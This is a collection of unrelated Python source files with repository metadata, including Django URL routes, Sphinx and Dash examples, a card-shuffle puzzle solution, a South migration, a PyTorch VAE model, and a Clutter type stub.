7321ac8c981ab9abb728e9c05fe1a2576ef0d878 | 3c327aa333bbeafacb8d5bd253814776ffcd0012 | /df_user/urls.py | bf6fcb54488289e42e7484712a3e096f56b612be | [] | no_license | 1635848644/shopping | c5d0a1dd2eb5716ece76045d6c2c261ca0f4db18 | d820e828eeed3911ea7741e4f11f4c6d83e993c6 | refs/heads/master | 2023-04-07T20:12:30.382805 | 2018-10-05T15:08:40 | 2018-10-05T15:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | #coding=utf-8
from django.conf.urls import url
from df_user import views
urlpatterns=[
    url('register/', views.register),
    url('login/', views.login),
    url('logout/', views.logout),
    url('addHarvsetAddress/', views.addHarvsetAddress),
    url('user_center_info/', views.user_center_info),
    url('user_center_order/', views.user_center_order),
    url('user_center_site/', views.user_center_site),
] | [
"[email protected]"
] | |
8fd82a02b96ef6922c7ccd498e793df6876f3f49 | 46c2418ecfcf3c7034a267364185208a665be583 | /edb/tools/docs/cli.py | 2c9295564c14536c42a30b9de2055cc410bdcb02 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jankeromnes/edgedb | 3434549fb0731632ed7adb7fcb329480dee50d91 | 40ea3317fe5bfec76d7b46f7b706a4cb8a0d9f94 | refs/heads/master | 2022-02-24T04:56:19.238048 | 2019-05-10T12:24:40 | 2019-06-17T10:29:09 | 185,984,093 | 0 | 0 | Apache-2.0 | 2022-01-28T09:00:32 | 2019-05-10T12:24:55 | Python | UTF-8 | Python | false | false | 1,466 | py | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2018-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edb.edgeql.pygments import EdgeQLLexer
from sphinx import domains as s_domains
from sphinx.directives import code as s_code
from . import shared
class CLISynopsisDirective(s_code.CodeBlock):
has_content = True
optional_arguments = 0
required_arguments = 0
option_spec = {}
def run(self):
self.arguments = ['cli-synopsis']
return super().run()
class CLIDomain(s_domains.Domain):
name = "cli"
label = "Command Line Interface"
directives = {
'synopsis': CLISynopsisDirective,
}
def setup_domain(app):
app.add_lexer("cli", EdgeQLLexer())
app.add_lexer("cli-synopsis", EdgeQLLexer())
app.add_role(
'cli:synopsis',
shared.InlineCodeRole('cli-synopsis'))
app.add_domain(CLIDomain)
| [
"[email protected]"
] | |
81b968c9d9e14ff5772ae28bead91e71f66173d8 | 50e2012ecea8307e278d1132ca0094adb940aff2 | /lib/review/my_process/my_multiprocessing.py | a299b8a3185df0bb568f1c9bc93484f95d15cfcb | [] | no_license | Lewescaiyong/my_library | 6689cae2db4aaa980b4bd5ed9f21691eefbff2fe | 35d0d29097823ccef74fa29ca8756a7f59ceeb78 | refs/heads/master | 2020-11-25T09:20:56.484275 | 2019-12-17T10:58:20 | 2019-12-17T10:58:20 | 228,593,219 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing.dummy import Pool  # thread-based drop-in for multiprocessing.Pool
def square(x):
    return x * x
if __name__ == '__main__':
    pool1 = multiprocessing.Pool()      # pool of worker processes
    pool2 = Pool()                      # pool of worker threads (multiprocessing.dummy)
    print(pool1.map(square, range(5)))  # [0, 1, 4, 9, 16]
    print(pool2.map(square, range(5)))  # same result, computed in threads
| [
"[email protected]"
] | |
1308c8f92d220ac7b01c451288da34696bcbe3f8 | c52ea8af6a4d3c32a0557c39d683a4d01b2188db | /ch10_dash_cytoscape_basic/layout/dash_cyto_grid_option_curve_style.py | 00701dcffe65b44108634f361e1dafb4d3efea61 | [
"MIT"
] | permissive | plotly-dash-book/plotly-dash-book | dcde031766d17adf6fc670c8aec9c8d4e267eeb7 | cc54f7ac6066a741f733facbd002222a87746e02 | refs/heads/master | 2022-06-27T02:46:25.502190 | 2022-06-08T03:21:23 | 2022-06-08T03:21:23 | 197,512,189 | 30 | 18 | MIT | 2021-05-31T04:47:36 | 2019-07-18T04:36:50 | Jupyter Notebook | UTF-8 | Python | false | false | 1,531 | py | import dash
import dash_cytoscape as cyto
import dash_html_components as html
app = dash.Dash(__name__)
# Define 17 nodes
nodes = [{"data": {"id": x, "label": f"{x}"}} for x in range(17)]
# Define the edges
edges = [
{"data": {"source": 0, "target": 1}},
{"data": {"source": 0, "target": 2}},
{"data": {"source": 0, "target": 3}},
{"data": {"source": 0, "target": 4}},
{"data": {"source": 2, "target": 3}},
{"data": {"source": 3, "target": 4}},
{"data": {"source": 4, "target": 5}},
{"data": {"source": 5, "target": 1}},
{"data": {"source": 1, "target": 6}},
{"data": {"source": 2, "target": 7}},
{"data": {"source": 2, "target": 8}},
{"data": {"source": 3, "target": 9}},
{"data": {"source": 4, "target": 10}},
{"data": {"source": 4, "target": 11}},
{"data": {"source": 4, "target": 12}},
{"data": {"source": 5, "target": 13}},
{"data": {"source": 5, "target": 14}},
{"data": {"source": 6, "target": 15}},
]
elements = nodes + edges
cyto_compo = cyto.Cytoscape(
id="dash_cyto_layout",
style={"width": "400px", "height": "400px"},
layout={"name": "grid", "rows": 3, "columns": 6},
elements=elements,
stylesheet=[
{"selector": "node", "style": {"content": "data(label)"}},
        # Set the edge curve style to a curved (unbundled bezier) line
{"selector": "edge", "style": {"curve-style": "unbundled-bezier"}},
],
)
app.layout = html.Div([cyto_compo])
if __name__ == "__main__":
app.run_server(debug=True) | [
"[email protected]"
] | |
805e778f090eb8a26dac37e6725197e259091f56 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /KLke67efuam6ajLrt_2.py | 1dc365bb23d969b5f0f0d4e85f8e8ff90a1cf504 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,765 | py | """
An **out-shuffle** , also known as an _out faro shuffle_ or a _perfect
shuffle_ , is a controlled method for shuffling playing cards. It is performed
by splitting the deck into two equal halves and interleaving them together
perfectly, with the condition that the top card of the deck remains in place.
Using an array to represent a deck of cards, an out-shuffle looks like:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
// Card 1 remains in the first position.
If we repeat the process, the deck eventually returns to original order.
Shuffle 1:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
Shuffle 2:
[1, 5, 2, 6, 3, 7, 4, 8] ➞ [1, 3, 5, 7, 2, 4, 6, 8]
Shuffle 3:
[1, 3, 5, 7, 2, 4, 6, 8] ➞ [1, 2, 3, 4, 5, 6, 7, 8]
// Back where we started.
Write a function that takes a positive even integer representing the number of
the cards in a deck, and returns the number of out-shuffles required to return
the deck to its original order.
### Examples
shuffle_count(8) ➞ 3
shuffle_count(14) ➞ 12
shuffle_count(52) ➞ 8
### Notes
* The number of cards is always **even** and **greater than one**. Thus, the smallest possible deck size is **two**.
* A **recursive** version of this challenge can be found via this [link](https://edabit.com/challenge/EXNAxFGgDDtE3SbQf).
"""
def shuffle_count(num):
half = num // 2
deck = list(range(num))
left, right = deck[:half], deck[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count = 1
while deck_s != deck:
left, right = deck_s[:half], deck_s[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count += 1
return count
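# Cross-check (editor's note, not part of the original challenge): an
# out-shuffle sends 0-indexed position i to 2*i mod (n - 1) for i < n - 1,
# with the last card fixed, so the answer is the multiplicative order of 2
# modulo n - 1.
def shuffle_count_order(num):
    m = num - 1
    count, power = 1, 2 % m
    while power != 1 % m:
        power = power * 2 % m
        count += 1
    return count
# shuffle_count_order(8) == 3, shuffle_count_order(14) == 12,
# shuffle_count_order(52) == 8, matching shuffle_count above.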
| [
"[email protected]"
] | |
50845d3ddab1ec682e0f345e3c75c1ba47438990 | ed872a0efb1db283f48176474e22f4c4ad31db79 | /src/accounts/migrations/0019_fix_socail_auth.py | ceffd3defcff51b96d673f95e0fffd2933671048 | [] | no_license | barontxu/djbookru | 34c2bf90e5d3542e4cbd2f3e600e1c0a12795d35 | 388bff0491e961f8efdf3cabd6c47d9fa2988547 | refs/heads/master | 2021-01-16T20:39:33.949315 | 2014-06-20T12:22:56 | 2014-06-20T12:22:56 | 23,031,683 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,111 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
depends_on = (
('social_auth', '0002_auto__add_unique_nonce_timestamp_salt_server_url__add_unique_associati'),
)
def forwards(self, orm):
"Write your forwards methods here."
orm['social_auth.UserSocialAuth'].objects.filter(provider='google').delete()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'accounts.achievement': {
'Meta': {'object_name': 'Achievement'},
'active_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inactive_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'accounts.announcement': {
'Meta': {'object_name': 'Announcement'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'accounts.emailconfirmation': {
'Meta': {'object_name': 'EmailConfirmation'},
'confirmation_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sent': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'accounts.user': {
'Meta': {'object_name': 'User', '_ormbases': ['auth.User']},
'achievements': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['accounts.Achievement']", 'through': "orm['accounts.UserAchievement']", 'symmetrical': 'False'}),
'biography': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_valid_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_doc_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'lng': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'accounts.userachievement': {
'Meta': {'unique_together': "(('user', 'achievement'),)", 'object_name': 'UserAchievement'},
'achievement': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Achievement']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'social_auth.association': {
'Meta': {'unique_together': "(('server_url', 'handle'),)", 'object_name': 'Association'},
'assoc_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'social_auth.nonce': {
'Meta': {'unique_together': "(('server_url', 'timestamp', 'salt'),)", 'object_name': 'Nonce'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'social_auth.usersocialauth': {
'Meta': {'unique_together': "(('provider', 'uid'),)", 'object_name': 'UserSocialAuth'},
'extra_data': ('social_auth.fields.JSONField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'social_auth'", 'to': "orm['accounts.User']"})
}
}
complete_apps = ['social_auth', 'accounts']
symmetrical = True
| [
"[email protected]"
] | |
be18a828d415817294724c04ce3bef696dac9a91 | d9af3a98a0864de7ebb0cfd1675a052779e46bf2 | /transformer_split/vae_model.py | e94ea7dccaf8599afbe98b4b7e286dfb52f4a1af | [
"MIT"
] | permissive | fredericgo/rl_morph_pytorch | eafc36128e60296743a42b25d417efe17128ac93 | 743cd82d82c16c8d52e5265b6cc5cdf490cb8945 | refs/heads/main | 2023-07-11T05:51:43.914695 | 2021-08-09T02:54:06 | 2021-08-09T02:54:06 | 344,523,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,741 | py | import os
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
import numpy as np
from transformer_split.encoders import PoseEncoder
from transformer_split.decoder import Decoder
from transformer_split.discriminator import Discriminator
def kl_divergence(mu, logvar):
return - 0.5 * (1 + logvar - mu.pow(2) - logvar.exp()).mean()
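# Editor's note: this is the closed-form KL(N(mu, diag(exp(logvar))) || N(0, I)),
# averaged over dimensions: 0.5 * (mu^2 + exp(logvar) - logvar - 1).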
def mse_loss(input, target):
return (input - target).pow(2).mean()
def frange_cycle_linear(start, stop, n_epoch, n_cycle=4, ratio=0.5):
L = np.ones(n_epoch)
period = n_epoch/n_cycle
step = (stop-start)/(period*ratio) # linear schedule
for c in range(n_cycle):
v , i = start , 0
while v <= stop and (int(i+c*period) < n_epoch):
L[int(i+c*period)] = v
v += step
i += 1
return L
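# Illustration (editor's note): frange_cycle_linear(0.0, 1.0, 8, n_cycle=2,
# ratio=0.5) yields the schedule [0, 0.5, 1, 1, 0, 0.5, 1, 1] (as a numpy
# array): beta ramps up twice over the run, the cyclical annealing schedule
# used below for the KL weight.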
class VAE_Model(nn.Module):
def __init__(self, args):
super(VAE_Model, self).__init__()
enc = PoseEncoder(
root_size=args.root_size,
feature_size=args.dim_per_limb,
latent_size=args.latent_dim,
batch_size=args.batch_size,
ninp=args.attention_embedding_size,
nhead=args.attention_heads,
nhid=args.attention_hidden_size,
nlayers=args.attention_layers,
max_num_limbs=args.max_num_limbs,
dropout=args.dropout_rate
)
decoder = Decoder(
root_size=args.root_size,
feature_size=args.dim_per_limb,
latent_size=args.latent_dim,
batch_size=args.batch_size,
ninp=args.attention_embedding_size,
nhead=args.attention_heads,
nhid=args.attention_hidden_size,
nlayers=args.attention_layers,
max_num_limbs=args.max_num_limbs,
dropout=args.dropout_rate
)
discriminator = Discriminator(
root_size=args.root_size,
feature_size=args.dim_per_limb,
max_num_limbs=args.max_num_limbs
)
self.add_module("enc", enc)
self.add_module("decoder", decoder)
self.add_module("discriminator", discriminator)
self.batch_size = args.batch_size
self.latent_dim = args.latent_dim
encoder_parameters = list(self.enc.parameters())
self.auto_encoder_optimizer = optim.Adam(
encoder_parameters + list(self.decoder.parameters()),
lr=args.ae_lr,
)
self.discriminator_optimizer = optim.Adam(
list(self.discriminator.parameters()),
lr=args.lr,
)
self.generator_optimizer = optim.Adam(
encoder_parameters + list(self.decoder.parameters()),
lr=args.lr,
)
self.beta = args.beta
self.device = torch.device("cuda" if args.cuda else "cpu")
self.root_size = args.root_size
self.discriminator_limiting_accuracy = args.discriminator_limiting_accuracy
self.gp_weight = args.gradient_penalty
self.beta_schedule = frange_cycle_linear(0, args.beta, args.epochs, 4, 1)
def _gradient_penalty(self, D, real_data, generated_data):
real_data = torch.cat(real_data, dim=-1)
generated_data = torch.cat(generated_data, dim=-1)
batch_size = real_data.size()[0]
d = int(real_data.size()[1] / 2)
# Calculate interpolation
alpha = torch.rand(batch_size, 1, device=real_data.device, requires_grad=True)
alpha = alpha.expand_as(real_data)
alpha = alpha.to(generated_data.device)
interpolated = alpha * real_data.data + (1 - alpha) * generated_data.data
interpolated = torch.split(interpolated, [d, d], dim=-1)
# Calculate probability of interpolated examples
prob_interpolated = D(*interpolated)
# Calculate gradients of probabilities with respect to examples
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=interpolated,
grad_outputs=torch.ones(prob_interpolated.size(),
device=real_data.device),
create_graph=True, retain_graph=True)[0]
# Gradients have shape (batch_size, num_channels, img_width, img_height),
# so flatten to easily take norm per example in batch
gradients = gradients.view(batch_size, -1)
# Derivatives of the gradient close to 0 can cause problems because of
# the square root, so manually calculate norm and add epsilon
gradients_norm = torch.sqrt(torch.sum(gradients ** 2, dim=1) + 1e-12)
# Return gradient penalty
return ((gradients_norm - 1) ** 2).mean()
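    # Editor's note: _gradient_penalty above implements the two-sided
    # WGAN-GP term E[(||grad_x D(x_interp)||_2 - 1)^2]; callers weight it
    # by self.gp_weight (see the commented-out call in train_discriminator).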
def split_root_body(self, x):
x_root = x[:, :self.root_size]
x_body = x[:, self.root_size:]
return x_root, x_body
def transfer(self, x, structure):
x_root, x_body = self.split_root_body(x)
zp, zc, mean, logvar = self.enc(x_body)
xr = self.decoder(zp, zc, structure)
xr = torch.cat([x_root, xr], dim=-1)
return xr
def train_recon(self, x1, x2, structure, epoch):
self.auto_encoder_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x2_root, x2_body = self.split_root_body(x2)
zp_1, zc_1, mean, logvar = self.enc(x1_body)
zp_2, zc_2, mean, logvar = self.enc(x2_body)
x1_r_body = self.decoder(zp_1, zc_2, structure)
x2_r_body = self.decoder(zp_2, zc_1, structure)
kl_loss = kl_divergence(mean, logvar).mean()
rec_loss1 = mse_loss(x1_r_body, x1_body)
rec_loss2 = mse_loss(x2_r_body, x2_body)
reconstruction_loss = rec_loss1 + rec_loss2
loss = reconstruction_loss + self.beta_schedule[epoch] * kl_loss
loss.backward()
torch.nn.utils.clip_grad_norm_(self.parameters(), 0.5)
self.auto_encoder_optimizer.step()
return rec_loss1, rec_loss1, kl_loss, self.beta_schedule[epoch], mean.mean(), logvar.mean()
def train_generator(self, x1, x3, structure3, epoch):
self.generator_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x3_root, x3_body = self.split_root_body(x3)
# zc: class content
zp_1, zc, mean, logvar = self.enc(x1_body)
xr_13 = self.decoder(zp_1, zc, structure3)
kl_loss = kl_divergence(mean, logvar).mean()
# True labels
true_labels = torch.ones(self.batch_size,
dtype=torch.long,
device=x1.device)
d1 = self.discriminator(x3_body, xr_13)
gen_loss_1 = F.cross_entropy(d1, true_labels)
z_random = torch.normal(0, 1,
size=(self.batch_size, self.latent_dim),
device=x1.device)
xr_r3 = self.decoder(z_random, zc, structure3)
d2 = self.discriminator(x3_body, xr_r3)
gen_loss_2 = F.cross_entropy(d2, true_labels)
generator_loss = gen_loss_1 + gen_loss_2 + self.beta_schedule[epoch]* kl_loss
generator_loss.backward()
self.generator_optimizer.step()
return gen_loss_1, gen_loss_2, kl_loss
def train_discriminator(self, x1, x2, x3, structure3):
self.discriminator_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x2_root, x2_body = self.split_root_body(x2)
        x3_root, x3_body = self.split_root_body(x3)
true_labels = torch.ones(self.batch_size,
dtype=torch.long,
device=x1.device)
d_real = self.discriminator(x2_body, x3_body)
disc_loss_real = F.cross_entropy(d_real, true_labels)
fake_labels = torch.zeros(self.batch_size,
dtype=torch.long,
device=x1.device)
zp_1, zc, mean, logvar = self.enc(x1_body)
xr_13 = self.decoder(zp_1, zc, structure3)
d_fake = self.discriminator(x3_body, xr_13)
disc_loss_fake = F.cross_entropy(d_fake, fake_labels)
#gp = self.gp_weight * self._gradient_penalty(self.discriminator,
# (x2_body, x3_body),
# (x2_body, xr_13))
discriminator_loss = disc_loss_real + disc_loss_fake #+ gp
discriminator_loss.backward()
# calculate discriminator accuracy for this step
target_true_labels = torch.cat((true_labels, fake_labels), dim=0)
discriminator_predictions = torch.cat((d_real, d_fake), dim=0)
_, discriminator_predictions = torch.max(discriminator_predictions, 1)
discriminator_accuracy = (discriminator_predictions.data == target_true_labels.long()
).sum().item() / (self.batch_size * 2)
if discriminator_accuracy < self.discriminator_limiting_accuracy:
self.discriminator_optimizer.step()
return discriminator_loss, discriminator_accuracy
def save_model(self, path):
model_path = os.path.join(path, 'vae_model')
torch.save({
"encoder": self.enc.state_dict(),
"decoder": self.decoder.state_dict(),
"discriminator": self.discriminator.state_dict(),
}, model_path)
def load_model(self, path):
model_path = os.path.join(path, 'vae_model')
data = torch.load(model_path)
self.enc.load_state_dict(data['encoder'])
self.decoder.load_state_dict(data['decoder'])
self.discriminator.load_state_dict(data['discriminator']) | [
"[email protected]"
] | |
a6be9d570514b770b12cd026d69be6ad9174e1eb | 7c246e0046136c7ab200ebf5a7e8fe772bd0738b | /02_django/css01/css/urls.py | de2d2f568f2315ed7bcf65c575c4dcfdb29a1fdd | [] | no_license | name-chichi/KDT-BigData | d6d87557945b6dc5c3dd7126a718f6de147f6d7b | 6bac43fdaf0b0be94996f2fab65f59916d500395 | refs/heads/main | 2023-06-30T07:04:54.296238 | 2021-07-30T03:09:54 | 2021-07-30T03:09:54 | 374,502,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from css import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home, name='home'),
path('html5', views.html5, name='html5'),
]
| [
"[email protected]"
] | |
93adf05fb8e78616581a275936e16a2c12ad1582 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Clutter/ZoomActionPrivate.py | 30f46ad6d498ed3b8d07dbaaa947fec7334f3b73 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,403 | py | # encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class ZoomActionPrivate(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(ZoomActionPrivate), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'ZoomActionPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'ZoomActionPrivate' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(ZoomActionPrivate)
| [
"[email protected]"
] | |
